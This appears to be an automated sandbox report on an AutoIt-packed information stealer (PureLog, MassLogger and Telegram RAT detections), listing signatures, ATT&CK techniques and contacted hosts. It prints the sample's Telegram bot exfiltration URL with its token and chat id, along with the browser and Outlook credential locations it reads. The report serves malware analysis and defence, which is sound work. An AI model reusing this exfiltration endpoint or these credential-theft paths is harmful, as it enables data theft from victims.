              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: njVvgA8pEB.exeBinary or memory string: WIN_81
              Source: njVvgA8pEB.exeBinary or memory string: WIN_XP
              Source: njVvgA8pEB.exeBinary or memory string: WIN_XPe
              Source: njVvgA8pEB.exeBinary or memory string: WIN_VISTA
              Source: njVvgA8pEB.exeBinary or memory string: WIN_7
              Source: njVvgA8pEB.exeBinary or memory string: WIN_8
              Source: njVvgA8pEB.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected MassLogger RAT
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00386283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00386283
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00386747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00386747

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		2
              Native API              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Valid Accounts              		3
              Obfuscated Files or Information              		Security Account Manager1
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation              		1
              DLL Side-Loading              		NTDS137
              System Information Discovery              		Distributed Component Object Model21
              Input Capture              		3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection              		2
              Valid Accounts              		LSA Secrets251
              Security Software Discovery              		SSH3
              Clipboard Data              		14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Virtualization/Sandbox Evasion              		Cached Domain Credentials11
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
              Access Token Manipulation              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
              Process Injection              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588596 Sample: njVvgA8pEB.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 26 reallyfreegeoip.org 2->26 28 api.telegram.org 2->28 30 2 other IPs or domains 2->30 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 46 8 other signatures 2->46 8 njVvgA8pEB.exe 2 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 26->42 44 Uses the Telegram API (likely for C&C communication) 28->44 process4 signatures5 48 Binary is likely a compiled AutoIt script file 8->48 50 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->50 52 Switches to a custom stack to bypass stack traces 8->52 11 njVvgA8pEB.exe 1 8->11         started        14 RegSvcs.exe 8->14         started        process6 signatures7 54 Binary is likely a compiled AutoIt script file 11->54 56 Writes to foreign memory regions 11->56 58 Maps a DLL or memory area into another process 11->58 16 RegSvcs.exe 15 2 11->16         started        process8 dnsIp9 20 api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom 16->20 22 checkip.dyndns.com 158.101.44.242, 49730, 80 ORACLE-BMC-31898US United States 16->22 24 reallyfreegeoip.org 104.21.16.1, 443, 49731 CLOUDFLARENETUS United States 16->24 32 Tries to steal Mail credentials (via file / registry access) 16->32 34 Tries to harvest and steal browser information (history, passwords, etc) 16->34 signatures10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              njVvgA8pEB.exe61%VirustotalBrowse
              njVvgA8pEB.exe71%ReversingLabsWin32.Trojan.AutoitInject
              njVvgA8pEB.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://crl.microsXWx0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              		104.21.16.1
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  checkip.dyndns.com
                  		158.101.44.242
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        		high
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.microsXWxRegSvcs.exe, 00000003.00000002.4189028635.0000000005882000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.orgRegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/botRegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://checkip.dyndns.org/qRegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  http://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4187157369.000000000339D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.4187157369.0000000003370000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.comRegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://api.telegram.orgRegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.4187157369.00000000032F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    149.154.167.220
                                                    		api.telegram.orgUnited Kingdom
                                                    		62041TELEGRAMRUfalse
                                                    104.21.16.1
                                                    		reallyfreegeoip.orgUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    158.101.44.242
                                                    		checkip.dyndns.comUnited States
                                                    		31898ORACLE-BMC-31898USfalse

                                                    General Information

                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1588596
                                                    Start date and time:2025-01-11 02:54:22 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 49s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:njVvgA8pEB.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:d0d59448b6afccf0fdfb1a8cdfcc65b3f6af5094aad27b83b580009310fdff6c.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@3/3
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 88%
                                                    • Number of executed functions: 53
                                                    • Number of non-executed functions: 284
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    20:55:27API Interceptor10203833x Sleep call for process: RegSvcs.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    149.154.167.220YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
